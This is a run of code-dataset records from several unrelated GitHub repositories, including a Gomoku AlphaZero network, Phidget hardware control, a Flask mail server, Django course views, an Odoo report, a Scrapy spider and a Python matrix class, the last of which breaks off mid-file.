loss_policy=loss_policy, entropy=entropy)\n\nclass ConvNetGomoku(ResNetGomoku):\n def __init__(self, config):\n nn.Module.__init__(self)\n\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, 32, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, kernel_size=3, padding=1)\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(128, 2, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(2 * config.board_dim ** 2, 64),\n nn.ReLU(inplace=True),\n nn.Linear(64, 1)\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(128, 4, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(4 * config.board_dim ** 2, config.board_dim ** 2)\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\nclass ConvNetLargeGomoku(ResNetGomoku):\n def __init__(self, config):\n nn.Module.__init__(self)\n\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, 32, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1)\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(128, 2, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(2 * config.board_dim ** 2, 64),\n nn.ReLU(inplace=True),\n nn.Linear(64, 1)\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(128, 4, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(4 * config.board_dim ** 2, config.board_dim ** 2)\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\nclass FullyConvNetGomoku(nn.Module):\n def __init__(self, config):\n super(FullyConvNetGomoku, self).__init__()\n\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, 32, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1)\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(128, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n )\n self.value_fc = nn.Sequential(\n nn.Linear(32, 32),\n nn.ReLU(inplace=True),\n nn.Linear(32, 1),\n nn.Tanh()\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(128, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 1, kernel_size=3, padding=1),\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\n def forward(self, x, label_value=None, label_policy=None):\n s = self.shared(x)\n v_, p_ = self.value_head(s), self.policy_head(s)\n v = F.max_pool2d(v_, kernel_size=v_.size()[2:]).squeeze(-1).squeeze(-1)\n value = self.value_fc(v)\n\n batch, _, board_dim1, board_dim2 = p_.shape\n policy = p_.reshape(batch, -1).log_softmax(dim=-1).reshape(batch, board_dim1, board_dim2)\n \n if label_value is None:\n return 0, dict(value=value, policy=policy.exp())\n\n loss_value = self.loss_value(value.squeeze(dim=1), label_value)\n log_label = label_policy.log()\n log_label[torch.isinf(log_label)] = 0\n\n loss_policy = (label_policy * (log_label - policy)).sum(dim=(1, 2)).mean()\n loss = loss_value + loss_policy\n entropy = -(policy * policy.exp()).sum(dim=(1, 2)).mean()\n return loss, dict(loss=loss, loss_value=loss_value, loss_policy=loss_policy, entropy=entropy)","repo_name":"ZhongxiaYan/alphazero_gomoku","sub_path":"alphazero/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"1117083553","text":"import sys\nimport time \nfrom Phidget22.Devices.VoltageOutput import *\nfrom Phidget22.PhidgetException import *\nfrom Phidget22.Phidget import *\nfrom Phidget22.Net import *\n\ntry:\n from PhidgetHelperFunctions import *\nexcept ImportError:\n sys.stderr.write(\"\\nCould not find PhidgetHelperFunctions. Either add PhdiegtHelperFunctions.py to your project folder \"\n \"or remove the import from your project.\")\n sys.exit()\n\nch0 = None\nch1 = None\n\n'''\n* Displays info about the attached Phidget channel. \n* Fired when a Phidget channel with onAttachHandler registered attaches\n*\n* @param self The Phidget channel that fired the attach event\n'''\ndef onAttachHandler(self):\n \n ph = self\n\n try:\n #If you are unsure how to use more than one Phidget channel with this event, we recommend going to\n #www.phidgets.com/docs/Using_Multiple_Phidgets for information\n \n print(\"\\nAttach Event:\")\n \n \"\"\"\n * Get device information and display it.\n \"\"\"\n channelClassName = ph.getChannelClassName()\n serialNumber = ph.getDeviceSerialNumber()\n channel = ph.getChannel()\n if(ph.getDeviceClass() == DeviceClass.PHIDCLASS_VINT):\n hubPort = ph.getHubPort()\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Hub Port: \" + str(hubPort) + \"\\n -> Channel: \" + str(channel) + \"\\n\")\n else:\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Channel: \" + str(channel) + \"\\n\")\n \n except PhidgetException as e:\n print(\"\\nError in Attach Event:\")\n DisplayError(e)\n traceback.print_exc()\n return\n\n\"\"\"\n* Displays info about the detached Phidget channel.\n* Fired when a Phidget channel with onDetachHandler registered detaches\n*\n* @param self The Phidget channel that fired the attach event\n\"\"\"\ndef onDetachHandler(self):\n\n ph = self\n\n try:\n #If you are unsure how to use more than one Phidget channel with this event, we recommend going to\n #www.phidgets.com/docs/Using_Multiple_Phidgets for information\n \n print(\"\\nDetach Event:\")\n \n \"\"\"\n * Get device information and display it.\n \"\"\"\n channelClassName = ph.getChannelClassName()\n serialNumber = ph.getDeviceSerialNumber()\n channel = ph.getChannel()\n if(ph.getDeviceClass() == DeviceClass.PHIDCLASS_VINT):\n hubPort = ph.getHubPort()\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Hub Port: \" + str(hubPort) + \"\\n -> Channel: \" + str(channel) + \"\\n\")\n else:\n print(\"\\n -> Channel Class: \" + channelClassName + \"\\n -> Serial Number: \" + str(serialNumber) +\n \"\\n -> Channel: \" + str(channel) + \"\\n\")\n \n except PhidgetException as e:\n print(\"\\nError in Detach Event:\")\n DisplayError(e)\n traceback.print_exc()\n return\n\n\"\"\"\n* Writes Phidget error info to stderr.\n* Fired when a Phidget channel with onErrorHandler registered encounters an error in the library\n*\n* @param self The Phidget channel that fired the attach event\n* @param errorCode the code associated with the error of enum type ph.ErrorEventCode\n* @param errorString string containing the description of the error fired\n\"\"\"\ndef onErrorHandler(self, errorCode, errorString):\n\n sys.stderr.write(\"[Phidget Error Event] -> \" + errorString + \" (\" + str(errorCode) + \")\\n\")\n \n\"\"\"\n* Creates, configures, and opens a VoltageOutput channel.\n* Provides interface for controlling Voltage of the VoltageOutput.\n* Closes out VoltageOutput channel\n*\n* @return 0 if the program exits successfully, 1 if it exits with errors.\n\"\"\"\ndef initialise():\n try:\n \"\"\"\n * Allocate a new Phidget Channel object\n \"\"\"\n global ch0\n global ch1\n try:\n ch0 = VoltageOutput()\n ch1 = VoltageOutput()\n except PhidgetException as e:\n sys.stderr.write(\"Runtime Error -> Creating VoltageOutput: \\n \")\n DisplayError(e)\n raise\n except RuntimeError as e:\n sys.stderr.write(\"Runtime Error -> Creating VoltageOutput: \\n \" + e)\n raise\n\n \"\"\"\n * Set matching parameters to specify which channel to open\n \"\"\"\n #You may remove this line and hard-code the addressing parameters to fit your application\n #channelInfo = AskForDeviceParameters(ch)\n \n ch0.setDeviceSerialNumber(493848)\n ch1.setDeviceSerialNumber(493848)\n ch0.setHubPort(0)\n ch1.setHubPort(0)\n ch0.setIsHubPortDevice(0)\n ch1.setIsHubPortDevice(0)\n ch0.setChannel(0) \n ch1.setChannel(1)\n \n \"\"\"\n * Add event handlers before calling open so that no events are missed.\n \"\"\"\n print(\"\\n--------------------------------------\")\n print(\"\\nSetting OnAttachHandler...\")\n ch0.setOnAttachHandler(onAttachHandler)\n ch1.setOnAttachHandler(onAttachHandler)\n \n print(\"Setting OnDetachHandler...\")\n ch0.setOnDetachHandler(onDetachHandler)\n ch1.setOnDetachHandler(onDetachHandler)\n \n print(\"Setting OnErrorHandler...\")\n ch0.setOnErrorHandler(onErrorHandler)\n ch1.setOnErrorHandler(onErrorHandler)\n \n \"\"\"\n * Open the channel with a timeout\n \"\"\"\n print(\"\\nOpening and Waiting for Attachment...\")\n \n try:\n ch0.openWaitForAttachment(5000)\n except PhidgetException as e:\n PrintOpenErrorMessage(e, ch0)\n raise EndProgramSignal(\"Program Terminated: Open Failed\")\n\n try:\n ch1.openWaitForAttachment(5000)\n except PhidgetException as e:\n PrintOpenErrorMessage(e, ch1)\n raise EndProgramSignal(\"Program Terminated: Open Failed\")\n \n except PhidgetException as e:\n sys.stderr.write(\"\\nExiting with error(s)...\")\n DisplayError(e)\n traceback.print_exc()\n print(\"Cleaning up...\")\n ch0.close()\n ch1.close()\n return 1\n \n except EndProgramSignal as e:\n print(e)\n print(\"Cleaning up...\")\n ch.close()\n return 1\n\ndef setVoltage(voltage, channel):\n try:\n # print(\"--------------------\\n\"\n # \"\\n | VoltageOutput voltage can be controlled by setting its Target Voltage.\\n\"\n # \" | The target voltage can be a number between MinVoltage and MaxVoltage.\\n\"\n # \"\\nInput a desired voltage and press ENTER\\n\"\n # \"Input Q and press ENTER to quit\\n\")\n try:\n voltage = float(voltage)\n except ValueError as e:\n print(\"Input must be a number, or Q to quit.\")\n return 0\n\n if (voltage > ch0.getMaxVoltage() or voltage < ch0.getMinVoltage()):\n print(\"Voltage must be between %.2f and %.2f\\n\" % (ch0.getMinVoltage(), ch0.getMaxVoltage()))\n return 0\n\n print(\"Setting VoltageOutput Voltage to \" + str(voltage))\n if channel == 0:\n ch0.setVoltage(voltage)\n elif channel == 1:\n ch1.setVoltage(voltage)\n\n except PhidgetException as e:\n sys.stderr.write(\"\\nExiting with error(s)...\")\n DisplayError(e)\n traceback.print_exc()\n print(\"Cleaning up...\")\n ch.close()\n return 1\n except EndProgramSignal as e:\n print(e)\n print(\"Cleaning up...\")\n ch.close()\n return 1\n\n'''\n* Perform clean up and exit\n'''\ndef close():\n global ch0\n global ch1\n print(\"Cleaning up...\")\n ch0.close()\n ch1.close()\n print(\"\\nExiting...\")\n return 0\n\n#main()\n\n","repo_name":"singhikra/LEGO_Kibble_Balance","sub_path":"Phidget.py","file_name":"Phidget.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31203065824","text":"import numpy as np\nimport torch\nfrom torch import nn\n\nfrom fastspeech2.VarianceAdaptorBlock.utilities import Transpose\n\n\nclass DurationPredictor(nn.Module):\n \"\"\" Duration Predictor \"\"\"\n\n def __init__(self):\n super(DurationPredictor, self).__init__()\n\n self.input_size = 256\n self.filter_size = 256\n self.kernel = 3\n self.conv_output_size = 256\n self.dropout = 0.1\n\n self.conv_net = nn.Sequential(\n Transpose(-1, -2),\n nn.Conv1d(\n self.input_size, self.filter_size,\n kernel_size=self.kernel, padding=1\n ),\n Transpose(-1, -2),\n nn.LayerNorm(self.filter_size),\n nn.ReLU(),\n nn.Dropout(self.dropout),\n Transpose(-1, -2),\n nn.Conv1d(\n self.filter_size, self.filter_size,\n kernel_size=self.kernel, padding=1\n ),\n Transpose(-1, -2),\n nn.LayerNorm(self.filter_size),\n nn.ReLU(),\n nn.Dropout(self.dropout)\n )\n\n self.linear_layer = nn.Linear(self.conv_output_size, 1)\n self.relu = nn.ReLU()\n\n def forward(self, encoder_output):\n encoder_output = self.conv_net(encoder_output)\n\n out = self.linear_layer(encoder_output)\n out = self.relu(out)\n out = out.squeeze()\n return out","repo_name":"leksious/TTS","sub_path":"fastspeech2/VarianceAdaptorBlock/DurationPredictor.py","file_name":"DurationPredictor.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17513870946","text":"import threading\n\nfrom flask import Flask\nfrom flask import request\nfrom flask_cors import CORS\n\nfrom flask_mail import Mail, Message\n\n### Import all blueprints ###\nfrom mail_server import app as mail_app\nfrom auth import auth \nfrom vip import vip\nfrom vip import UPLOAD_FOLDER\nfrom config import system_mail_config as mail_conf\nfrom config import ssl_config\n\nmail = Mail()\napp = Flask(__name__)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = mail_conf['email_address']\napp.config['MAIL_PASSWORD'] = mail_conf['password']\napp.config['MAIL_USE_TLS'] = False \napp.config['MAIL_USE_SSL'] = True\nmail.init_app(app)\n\napp.register_blueprint(auth, url_prefix='/auth')\napp.register_blueprint(vip, url_prefix='/vip')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nCORS(app)\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n return 'Hello world'\n\n@app.route('/send_mail', methods=['POST'])\ndef send_mail():\n if(request.method == 'POST'):\n message = request.form['message']\n sender = request.form['sender']\n recipient = request.form['recipient']\n\n msg = Message('[Virtual Interview System] Password confirmation',\n sender = sender,\n recipients=[recipient])\n\n msg.body = message\n\n mail.send(msg)\n\n return 'success'\n\ndef runMailServer():\n mail_app.run(host='0.0.0.0', port=8081) \n\nif __name__ == '__main__':\n mail_thread = threading.Thread(target=runMailServer, args=())\n mail_thread.daemon = True \n mail_thread.start()\n app.run(host='0.0.0.0', port=8080, ssl_context=(ssl_config['cert'], ssl_config['key']))\n","repo_name":"hieubkvn123/VirtualInterviewPlatform","sub_path":"api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9426539285","text":"from typing import List\n\nimport jiwer\nimport jiwer.transforms as tr\nfrom packaging import version\n\nimport platform\nif version.parse(platform.python_version()) < version.parse(\"3.8\"):\n import importlib_metadata\nelse:\n import importlib.metadata as importlib_metadata\n\n\nSENTENCE_DELIMITER = \"\"\n\n\nif version.parse(importlib_metadata.version(\"jiwer\")) < version.parse(\"2.3.0\"):\n class SentencesToListOfCharacters(tr.AbstractTransform):\n def __init__(self, sentence_delimiter: str = \" \"):\n self.sentence_delimiter = sentence_delimiter\n\n def process_string(self, s: str):\n return list(s)\n\n def process_list(self, inp: List[str]):\n chars = []\n for sent_idx, sentence in enumerate(inp):\n chars.extend(self.process_string(sentence))\n if self.sentence_delimiter is not None and self.sentence_delimiter != \"\" and sent_idx < len(inp) - 1:\n chars.append(self.sentence_delimiter)\n return chars\n\n cer_transform = tr.Compose(\n [tr.RemoveMultipleSpaces(), tr.Strip(), SentencesToListOfCharacters(SENTENCE_DELIMITER)]\n )\nelse:\n cer_transform = tr.Compose(\n [\n tr.RemoveMultipleSpaces(),\n tr.Strip(),\n tr.ReduceToSingleSentence(SENTENCE_DELIMITER),\n tr.ReduceToListOfListOfChars(),\n ]\n )\n\nclass CER:\n def compute(self, predictions, references, concatenate_texts=False):\n if concatenate_texts:\n return jiwer.compute_measures(\n references,\n predictions,\n truth_transform=cer_transform,\n hypothesis_transform=cer_transform,\n )[\"wer\"]\n\n incorrect = 0\n total = 0\n for prediction, reference in zip(predictions, references):\n measures = jiwer.compute_measures(\n reference,\n prediction,\n truth_transform=cer_transform,\n hypothesis_transform=cer_transform,\n )\n incorrect += measures[\"substitutions\"] + measures[\"deletions\"] + measures[\"insertions\"]\n total += measures[\"substitutions\"] + measures[\"deletions\"] + measures[\"hits\"]\n\n return incorrect / total\n","repo_name":"juchengquan/project_eva","sub_path":"src/metrics/cer.py","file_name":"cer.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32921424301","text":"from odoo import fields, models\n\n\nclass SourceFundMonitorReport(models.Model):\n _inherit = \"source.fund.monitor.report\"\n\n date_from = fields.Date()\n date_to = fields.Date()\n active = fields.Boolean()\n budget_period_id = fields.Many2one(\n comodel_name=\"budget.period\",\n index=True,\n )\n\n @property\n def _table_query(self):\n \"\"\"Overwrite query table on source of fund monitoring\"\"\"\n return \"\"\"\n select a.*, d.id as date_range_id, p.id as budget_period_id\n from ({}) a\n left outer join date_range d\n on a.date_to between d.date_start and d.date_end\n left outer join budget_period p\n on a.date_to between p.bm_date_from and p.bm_date_to\n {}\n \"\"\".format(\n self._get_sql(), self._get_where_sql()\n )\n\n # Budget\n def _select_budget(self):\n select_budget_query = super()._select_budget()\n # Replace null analytic and amount\n budget_query = (\n select_budget_query[0]\n .replace(\"1000000000 + sf.id as id\", \"1000000000 + al.id as id\")\n .replace(\n \"null::integer as analytic_account_id,\",\n \"aa.id as analytic_account_id,\",\n )\n .replace(\"null::integer as amount\", \"al.released_amount as amount\")\n )\n select_budget_query[0] = budget_query\n select_budget_query[\n 10\n ] = \"\"\"\n al.date_from as date_from,\n al.date_to as date_to,\n bc.active as active\n \"\"\"\n return select_budget_query\n\n def _from_budget(self):\n from_budget_query = super()._from_budget()\n from_budget_query = \"\\n\".join(\n [\n from_budget_query,\n \"\"\"\n join budget_allocation_line al on al.fund_id = sf.id\n join account_analytic_account aa\n on aa.id = al.analytic_account_id\n join budget_control bc\n on bc.analytic_account_id = aa.id\n left join mis_budget_item mbi\n on mbi.budget_control_id = bc.id\n \"\"\",\n ]\n )\n return from_budget_query\n\n # All consumed\n def _select_statement(self, amount_type):\n select_statement = super()._select_statement(amount_type)\n select_statement[\n 10\n ] = \"\"\"\n aa.bm_date_from as date_from,\n aa.bm_date_to as date_to,\n 1::boolean as active\n \"\"\"\n return select_statement\n\n def _from_statement(self, amount_type):\n from_statment = super()._from_statement(amount_type)\n from_statment = \"\\n\".join(\n [\n from_statment,\n \"\"\"\n join account_analytic_account aa\n on aa.id = a.analytic_account_id\n \"\"\",\n ]\n )\n return from_statment\n\n def _get_where_sql(self):\n return \"where d.type_id = p.plan_date_range_type_id\"\n","repo_name":"ecosoft-odoo/budgeting","sub_path":"budget_allocation_fund/report/source_fund_monitor_report.py","file_name":"source_fund_monitor_report.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74852963442","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse\n\nfrom .models import Course\nfrom .forms import CourseForm\nfrom first_django.utils import process_modal_vars, process_form_vars\n\n\n# Create your views here.\n\n\ndef course_list_view(request):\n course_queryset = Course.objects.all()\n context = {\n \"courses\": course_queryset\n }\n return render(request, \"course/list.html\", context=context)\n\n\ndef course_detail_view(request, id):\n obj = Course.objects.get(id=id)\n context = {\n \"object\": obj,\n \"modal\": process_modal_vars(\n \"Delete Confirmation\", \"Do you want to delete this content?\", \"Yes\", reverse(\"courses:delete\",\n kwargs={\"id\": id})\n )\n }\n return render(request, \"course/detail.html\", context=context)\n\n\n@login_required\ndef course_create_view(request):\n form = CourseForm(request.POST or None)\n context = {\n \"form\": form,\n \"generic_form\": process_form_vars(\"Create\", reverse(\"courses:list\"))\n }\n if form.is_valid():\n obj = form.save()\n context[\"obj\"] = obj\n created = False\n if obj is not None:\n created = True\n context[\"created\"] = created\n\n return render(request, \"course/create.html\", context=context)\n\n\n@login_required\ndef course_update_view(request, id):\n course_obj = get_object_or_404(Course, id=id)\n context = {\n \"generic_form\": process_form_vars(\"Update\", reverse(\"courses:list\"), reverse(\"courses:edit\", kwargs={\"id\": id}))\n }\n if request.method == 'POST':\n form = CourseForm(request.POST)\n if form.is_valid():\n course_obj.course = form.cleaned_data['course']\n course_obj.subject = form.cleaned_data['subject']\n course_obj.location = form.cleaned_data['location']\n course_obj.instructor = form.cleaned_data['instructor']\n course_obj.grade = form.cleaned_data['grade']\n course_obj.semester = form.cleaned_data['semester']\n course_obj.year = form.cleaned_data['year']\n course_obj.credit = form.cleaned_data['credit']\n course_obj.save()\n return redirect(reverse(\"courses:list\"))\n\n else:\n form = CourseForm(data={\n 'course': course_obj.course,\n 'subject': course_obj.subject,\n 'location': course_obj.location or None,\n 'instructor': course_obj.instructor or None,\n 'grade': course_obj.grade,\n 'semester': course_obj.semester or None,\n 'year': course_obj.year or None,\n 'credit': course_obj.credit,\n })\n context[\"form\"] = form\n return render(request, \"course/update.html\", context=context)\n\n\n@login_required\ndef course_delete_view(request, id):\n if request.method == \"POST\":\n course_obj = get_object_or_404(Course, id=id)\n course_obj.delete()\n return redirect(reverse(\"courses:list\"))","repo_name":"orngylw/first-django","sub_path":"course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21677713876","text":"# Simple mad libs generator in python \n\nimport os\n\nnoun1 = input(\"Enter a noun: \")\nnoun2 = input(\"Enter another noun: \")\nadjective1 = input(\"Enter an adjective: \")\nadjective2 = input(\"Enter another adjective: \")\n\nos.system(\"cls\") # Clearing the screen \n\nmessage = f\"roses are {adjective1},\\n{noun1} are blue,\\n{noun2} are {adjective2},\\nAnd so are you!\"\nprint(message)\n","repo_name":"SuyogPrasai/mad_libs_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7475748587","text":"from typing import List\n\n# Runtime: 176 ms, faster than 39.31% of Python3\n# Memory Usage: 14.8 MB, less than 9.00%\nclass Solution:\n def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:\n max_flower_add = 0\n\n def can_planted(index):\n # global flower\n if flowerbed[index] == 0 and (index - 1 < 0 or flowerbed[index-1] == 0) and (index + 1 == len(flowerbed) or flowerbed[index+1] == 0):\n return True\n return False\n\n for i, cell in enumerate(flowerbed):\n if can_planted(i):\n flowerbed[i] = 1\n max_flower_add += 1\n i += 1\n\n return n <= max_flower_add\n\n\n# better python:\n def canPlaceFlowers2(self, flowerbed: List[int], n: int) -> bool:\n plant = 0\n canPlant = True\n for i in range(len(flowerbed)):\n if flowerbed[i]:\n canPlant = False\n else:\n if canPlant:\n if i + 1 >= len(flowerbed) or flowerbed[i + 1] == 0:\n plant += 1\n canPlant = False\n else:\n canPlant = True\n if plant > n: return True\n return plant >= n","repo_name":"hoanghailethe/Pythonhead","sub_path":"Leetcode/11.14.TestOn/_605_CanPlaceFlower.py","file_name":"_605_CanPlaceFlower.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7585570604","text":"#!/usr/bin/env python\n# coding: utf-8\n#声明必须放在前两行,# coding=\n\n'''\n\n@author: \n\n@license: \n\n@contact: \n\n@software: Test\n\n@file: 163Spider.py\n\n@time: 2017/12/3 下午6:47\n\n@desc:\n'''\nimport scrapy\nfrom mySpider.items import MyspiderItem\nclass my163Spider(scrapy.Spider):\n name='163spider'#执行的时候用到 scrapy crawl name\n allowed_domains=['http://www.163.com']\n start_urls=['http://money.163.com/special/pinglun/']\n def parse(self,response):#名字不能乱改\n with open('pinglun.html','w') as f:\n f.write(response.body)#这是scrapy的用法,urllib2是text或者content.\n news_list=response.xpath('//div[@class=\"item_top\"]')\n newsItem=[]\n for each in news_list:\n item=MyspiderItem()\n title=each.xpath('./h2/a/text()').extract()\n time=each.xpath('./p/span/text()').extract()\n abstract=each.xpath('./p/text()').extract()\n item['title']=title[0]\n item['time']=time[0]\n item['abstract']=abstract[0]\n yield item#拿到一个数据,就交给管道文件处理。不用把他放到一个list里面集中处理。yield还可以处理请求\n\n\n","repo_name":"wiky2/mytestproject","sub_path":"testforothers/Scrapy/scrapytest1/mySpider/mySpider/spiders/163Spider.py","file_name":"163Spider.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"74174594163","text":"import math\nimport random\n\n#sigmoid function\ndef sigmoid(x):\n return 1/(1+math.exp( -x ))\n\ndef dsigmoid(y):\n return y * (1 - y)\nclass Matrix:\n def __init__(self, rows, cols,add):\n self.rows = rows\n self.cols = cols\n \n self.matrix = []\n print()\n #z = input()\n for i in range(rows):\n ea_row = []\n for j in range(cols):\n # if (add==\"\"):\n # ea_row.append(z)\n # else:\n # ea_row.append(int(z))\n \n ea_row.append(0) \n self.matrix.append(ea_row)\n \n #draw the matrix\n def __repr__(self):\n outStr = \"\"\n for i in range(self.rows):\n outStr += 'Row %s = %s\\n' % (i+1, self.matrix[i])\n return outStr\n \n #giving the random numbers for matrix\n def randomise(self):\n for i in range(self.rows):\n for j in range(self.cols):\n self.matrix[i][j] = random.random()\n return self\n \n #set element of the matrix\n def setitem(self, col, row, v):\n self.matrix[col-1][row-1] = v\n \n \n #get element of the matrix\n def getitem(self, col, row):\n return self.matrix[col-1][row-1]\n \n\n #add number to any element of the matrix\n def addition(self, col, row,w):\n a = self.matrix[col-1][row-1]\n b = float(w) + float(a)\n return b\n \n #add number to any element of the matrix\n def pluse(self,w):\n #a = self.matrix[][row-1]\n result = Matrix(self.rows,self.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = float(w) + float(a)\n result.matrix[i][j] = b\n return result\n \n #multiply number to any element of the matrix\n def multiplication(self,w):\n #a = self.matrix[][row-1]\n result = Matrix(self.rows,self.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = float(w) * float(a)\n result.matrix[i][j] = b\n return result\n \n @staticmethod\n def sub(self,other):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = other.matrix[i][j]\n c = float(a) - float(b)\n result.matrix[i][j] = c\n return result\n \n #add a number to matrix elements\n def add(self,other):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = other.matrix[i][j]\n c = float(a)+float(b)\n result.matrix[i][j] = c\n return result\n\n #hadamard multiplication of matrix\n def mul(self,other):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n a = self.matrix[i][j]\n b = other.matrix[i][j]\n c = float(a) * float(b)\n result.matrix[i][j] = c\n return result\n \n @staticmethod\n def map(mat,func):\n result = Matrix(self.rows,other.cols,0)\n for i in range(self.rows):\n for j in range(self.cols):\n val = mat.matrix[i][j]\n result.matrix[i][j] = func(val)\n \n \n \n #converting input matrix to the form of vector\n @staticmethod\n def fromArray(array):\n m = Matrix(len(array),1,0)\n for i in range(len(array)):\n m.matrix[i][0] = array[i]\n return m\n \n \n def toarray(self):\n arr = []\n #a = self.rows\n #b = self.cols\n #print(a)\n #print(b)\n for i in range(self.rows):\n for j in range(self.cols):\n arr.append(self.matrix[i][j])\n #print(arr)\n return arr\n \n #matrix multiplication (dot product)\n @staticmethod\n def matrix_multiplication(self,other):\n z = self.rows\n q = self.cols\n w = other.rows\n y = other.cols\n \n if q != w:\n print(\"column of 1st matrix must match rows of 2nd matrix\")\n else:\n result = Matrix(self.rows,other.cols,0)\n for i in range(z):\n for j in range(y):\n s = 0\n e = 0\n for k in range(w):\n a = self.matrix[i][k]\n b = other.matrix[k][j] \n\n c = float(a) * float(b)\n #print(c)\n s += c\n \n result.matrix[i][j] = s\n return result\n \n #make the transpose of the inpute matrix\n #@staticmethod\n def transpose(self):\n result = Matrix(self.cols,self.rows,0)\n for i in range(self.rows):\n for j in range(self.cols):\n #print(self.matrix[i][j])\n result.matrix[j][i] = self.matrix[i][j]\n return result\n \n #mapping the sigmoid 